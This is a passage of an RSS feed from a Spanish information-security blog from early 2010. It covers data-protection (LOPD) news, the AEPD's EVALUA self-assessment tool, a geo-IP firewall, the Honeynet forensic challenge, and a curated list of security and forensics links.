&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En las multas por infracciones de la Ley Orgánica de Protección de Datos de carácter Personal debe tenerse en cuenta el principio de proporcionalidad, lo que significa atender las circunstancias de cada caso y las actuaciones que adoptan las empresas para cumplir con la normativa."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.expansion.com/2010/01/18/juridico/1263831122.html"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Evento: LOPD en el Sector Sanitario: Retos de Seguridad y Privacidad (España)&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;"Madrid, 10 de febrero de 2010&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El tratamiento de datos de carácter personal en el ámbito sanitario constituye un área de especial sensibilidad ya que se ha de conjugar el derecho de los ciudadanos a recibir asistencia médica con el de la protección de sus historiales. En este seminario, se analizarán las claves de este delicado equilibrio, las fórmulas para proteger los datos frente a las nuevas tecnologías así como las resoluciones más novedosas en este terreno."&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://seguridad-informacion.blogspot.com/2010/01/evento-lopd-en-el-sector-sanitario.html"&gt;Leer Más&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-2976984814687198700?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/93cad0yJ0kA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/93cad0yJ0kA/recopilatorio-noticias-enero-2010.html</link><author>noreply@blogger.com (Ramon Vicens)</author><thr:total>0</thr:total><feedburner:origLink>http://www.securecorner.net/2010/02/recopilatorio-noticias-enero-2010.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-481790359439994350</guid><pubDate>Mon, 01 Feb 2010 07:30:00 +0000</pubDate><atom:updated>2010-02-01T09:20:05.561+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">LOPD</category><title>EVALUA LOPD ya está disponible</title><description>&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.privacyconference2009.org/program/Presentaciones/common/pdfs/ricard_martinez_madrid.pdf"&gt;EVALUA&lt;/a&gt; la herramienta de autodiagnóstico de la AEPD ya está &lt;a href="http://212.170.243.77:8080/Evalua/home.seam"&gt;disponible&amp;nbsp;para el público&lt;/a&gt;. La herramienta permite realizar una autoevaluación del cumplimiento de la Ley de Protección de Datos y del Reglamento de Medidas de Seguridad a aplicar en función de la criticidad de los mismos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;¿Cómo funciona? La herramienta realiza la evaluación en base a cuestionarios que se pueden responder online directamente mediante un &lt;i&gt;checkbox&lt;/i&gt; de modo que una vez respondidas todas las preguntas, uno puede obtener un informe en PDF del estado de la Organización respecto a la LOPD y sus medidas técnicas de seguridad.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Destacar que el hecho de no tener que aportar identificación del que realiza la autoevaluación es un punto a favor de la herramienta, ya que los datos introducidos y por lo tanto, potenciales incumplimientos, podrían ser procesados directamente por la AEPD. Adicionalmente, EVALUA incorpora un registro de sesión que permite retomar el test en el punto en que se dejó, así como volver a obtener el informe de resultados.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Si bien hay que reconocer el esfuerzo realizado y felicitar a la AEPD por la herramienta desarrollada, como profesional del mundo de la seguridad, opino que EVALUA es &lt;b&gt;solo &lt;/b&gt;una herramienta de autodiagnóstico y obviamente al ser respondida por el Responsable de Seguridad o por el Propietario del fichero/s de la misma Organización, uno tiende a &amp;nbsp;pensar que los resultados obtenidos no serán tan objetivos como los que pueda obtener un auditor externo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-481790359439994350?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/oSt503mqw_A" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/oSt503mqw_A/evalua-lopd-ya-esta-disponoble.html</link><author>noreply@blogger.com (Ramon Vicens)</author><thr:total>0</thr:total><feedburner:origLink>http://www.securecorner.net/2010/02/evalua-lopd-ya-esta-disponoble.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-9016368113542054344</guid><pubDate>Fri, 29 Jan 2010 19:33:00 +0000</pubDate><atom:updated>2010-01-29T20:34:50.484+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>Nuevo Dominio securecorner.net</title><description>Hola a todos !!!&lt;br /&gt;
&lt;br /&gt;
Después de varios días de absentismo bloggero, he hecho un pequeño cambio en el blog. He registrado un dominio para que podais acceder más fácilmente al blog.&lt;br /&gt;
&lt;br /&gt;
El dominio es: securecorner.net y podreis acceder al blog mediante:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;http://securecorner.net&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;http://www.securecorner.net&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;
e incluso si no actualizais vuestros bookmarks, deberíais seguir accediendo desde http://securecorner.blogspot.com&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-9016368113542054344?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/ZspJcVVPYaw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/ZspJcVVPYaw/nuevo-dominio-wwwsecurecornernet.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/01/nuevo-dominio-wwwsecurecornernet.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-5572617410270275208</guid><pubDate>Wed, 20 Jan 2010 23:04:00 +0000</pubDate><atom:updated>2010-01-21T00:16:14.787+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Políticas Seguridad</category><title>Firewalls con filtrado por localización geográfica</title><description>&lt;div style="text-align: justify;"&gt;El otro día en &lt;a href="http://www.securitybydefault.com/2010/01/geo-ips-10.html"&gt;Security by Default&lt;/a&gt; publicaron un interesante artículo explicando la implementación de un firewall realizado por un coautor del blog.&amp;nbsp;El post me pareció realmente interesante y por ello quería destacarlo. Sin duda, será otra entrada más que añadir en la lista de TODOs.&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La herramienta básicamente consiste en combinar la tecnología de la geolocalización de IPs con las políticas de filtrado de iptables mediante un fichero de configuración XML. Algo muy poco usual hoy en día en dichas políticas. No es una protección infalible (si, existen los proxys) pero sin duda alguna ayuda a poner más barreras ante un atacante que se proponga vulnerar un sistema.&amp;nbsp;A mi modo de ver, es una buena idea que permite tener mucho más acotados los accesos permitidos dentro de nuestros sistemas, siempre y cuando localizar la IP origen no conlleve una carga alta y con ello se realentice la transferencia de datos...&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ya sabeis, a leer el post!&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Saludos,&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-5572617410270275208?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/NU55bi_K6Xk" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/NU55bi_K6Xk/firewalls-con-filtrado-por-localizacion.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/01/firewalls-con-filtrado-por-localizacion.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-616125053530345984</guid><pubDate>Thu, 14 Jan 2010 18:09:00 +0000</pubDate><atom:updated>2010-01-14T19:09:53.599+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Forensics</category><title>Honeynet Project Forensic Challenge</title><description>&lt;div style="text-align: justify;"&gt;En el &lt;a href="http://www.honeynet.org/node/503"&gt;blog&lt;/a&gt; de Honeynet Project&amp;nbsp;anunciaron el pasado dia&amp;nbsp;12 de enero&amp;nbsp;que a partir del 18 del mismo mes, se colgará el primer "&lt;em&gt;Challenge&lt;/em&gt;" forense del 2010, el cual se podrá descargar desde la &lt;a href="http://honeynet.org/challenges"&gt;Web&lt;/a&gt; el mismo día. Se dispondrá de dos semanas para presentar los informes y resultados derivados de la investigación. Los resultados saldrán el 15 de febrero, premiando los tres mejores informes recibidos.&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Así anunciaba Christian Seifert, Chief Communications Officer de The Honeynet Project la primera hornada de &lt;em&gt;forensic challenges&lt;/em&gt; del 2010...&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;em&gt;"I am very happy to announce the Honeynet Project Forensic Challenge 2010. The purpose of the Forensic Challenges is to take learning one step farther. Instead of having the Honeynet Project analyze attacks and share their findings, Forensic Challenges give the security community the opportunity to analyze attacks and share their findings. In the end, individuals and organizations not only learn about threats, but also learn how to analyze them. Even better, individuals can access the write-ups from other individuals, and learn about new tools and techniques for analyzing attacks. Best of all, the attacks of the Forensic Challenge are attacks encountered in the wild, real hacks, provided by our members."&lt;/em&gt; &lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Para los curiosos, si quereis consultar algunos retos de años anteriores podeis consultar en la misma &lt;a href="http://honeynet.org/challenges"&gt;página de retos de Honeynet&lt;/a&gt;&amp;nbsp;(&lt;a href="http://old.honeynet.org/scans/index.html"&gt;Scan of the Month&lt;/a&gt;, &lt;a href="http://old.honeynet.org/reverse/index.html"&gt;The Reverse Challenge&lt;/a&gt; (Ingeniería inversa), &lt;a href="http://old.honeynet.org/challenge/index.html"&gt;The Forensic Challenge&lt;/a&gt;&amp;nbsp;). &lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&amp;nbsp; &lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Saludos, &lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-616125053530345984?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/kJJQyjE_Ct0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/kJJQyjE_Ct0/honeynet-project-forensic-challenge.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/01/honeynet-project-forensic-challenge.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-2544955903294001353</guid><pubDate>Mon, 11 Jan 2010 22:53:00 +0000</pubDate><atom:updated>2010-02-05T17:17:49.518+01:00</atom:updated><title /><description>&lt;span class="Apple-style-span" style="border-collapse: collapse; color: #333333; font-family: arial, sans-serif; font-size: 13px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;A continuación adjunto algunos Links de interés en materia de seguridad y forensics..&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Distribuciones LiveCD&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.remote-exploit.org/"&gt;Backtrack&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://samurai.inguardians.com/"&gt;Samurai&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://computer-forensics.sans.org/community/downloads/"&gt;SIFT SANS Workstation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.caine-live.net/"&gt;CAINE&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Penetration test Frameworks/Methodologies&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.owasp.org/index.php/Main_Page"&gt;Owasp&lt;/a&gt;&amp;nbsp;(&lt;a href="http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"&gt;Top 10 Vulnerabilities&lt;/a&gt;, &lt;a href="http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project"&gt;WebGoat&lt;/a&gt;, &lt;a href="http://www.owasp.org/index.php/Category:OWASP_Testing_Project"&gt;Testing Guide&lt;/a&gt;, &lt;a href="http://www.owasp.org/index.php/Category:OWASP_Guide_Project"&gt;Development Guide&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.isecom.org/osstmm/"&gt;OSSTMM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.eccouncil.org/certification.htm"&gt;CEH&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html"&gt;Vulnerability Assesment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://wirelessdefence.org/"&gt;Wireless Defense&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.oissg.org/"&gt;OISSG - ISAF&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;b&gt;Para practicar ...&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.dvwa.co.uk/"&gt;Dam vulnerable linux&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project"&gt;OWASP WebGoat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.foundstone.com/us/resources/proddesc/hacmebank.htm"&gt;Hacme Bank&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm"&gt;Hacme Travel&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm"&gt;Hacme Shipping&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm"&gt;Hacme Casino&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm"&gt;Hacme Books&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.bonsai-sec.com/en/research/moth.php"&gt;Moth&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10"&gt;Mutillidae&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.canyouhackme.com/"&gt;Can you hack me&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Máquinas Virtuales&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://virtualboximages.com/"&gt;Virtual Box Images&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;VMware&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Recursos online&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://serversniff.net/index.php"&gt;Serversniff&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://uptime.netcraft.com/up/graph"&gt;Netcraft&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://shodan.surtri.com/"&gt;Shodan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://isc.sans.org/tools/index.html"&gt;SANS Online Scanner&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Blogs seguridad y forensics&lt;span class="Apple-style-span" style="font-size: medium; font-weight: normal;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.tataki.es/"&gt;Tataki&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.securitybydefault.com/"&gt;Security by default&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://laramies.blogspot.com/"&gt;Laramies Corner&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://elladodelmal.blogspot.com/"&gt;Un Informático en el lado del mal&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.radajo.com/"&gt;RaDaJo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://conexioninversa.blogspot.com/"&gt;Conexioninversa&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.sahw.com/wp/"&gt;Blog de Sergio Hernando&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blogs.sans.org/computer-forensics/"&gt;SANS computer forensics&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.forensickb.com/"&gt;Forensickb&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.pentester.es/"&gt;Pentester.es&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://neosysforensics.blogspot.com/"&gt;Neo System Forensics&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://windowsir.blogspot.com/"&gt;Windows Incident Response&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://blog.didierstevens.com/"&gt;Blog de Didier Stevens&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.jessland.net/common/pgs/index.php?rf=h&amp;amp;lang=eng"&gt;Jessland - Jess Garcia's Website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Referencias Legales y Normativas&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.bsigroup.es/es/certificacion-y-auditoria/Sistemas-de-gestion/estandares-esquemas/ISOIEC-27001/"&gt;ISO/IEC 27001:2005&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.agpd.es/portalweb/index-ides-idphp.php"&gt;Ley Orgánica de Protección de Datos&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.csae.map.es/csi/pdf/20090715_Proyecto_RD_ENS_cn.pdf"&gt;Esquema Nacional de Seguridad&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.bsigroup.es/es/certificacion-y-auditoria/Sistemas-de-gestion/estandares-esquemas/BS-25999/"&gt;BS25999&lt;/a&gt;: Continuidad del Negocio&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: xx-large;"&gt;&lt;b&gt;Fraude y Cibercrimen&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.socinfo.info/seminarios/pasarelas/guardiacivil.pdf"&gt;Presentación Guardia Civil&lt;/a&gt; por Juan Salom Clotet, Jefe del Grupo de Delitos Telemáticos&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-2544955903294001353?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/dhQMgpxInjQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/dhQMgpxInjQ/continuacion-adjunto-algunos-links-de.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/01/continuacion-adjunto-algunos-links-de.html</feedburner:origLink></item><language>en-us</language><media:rating>nonadult</media:rating></channel></rss>

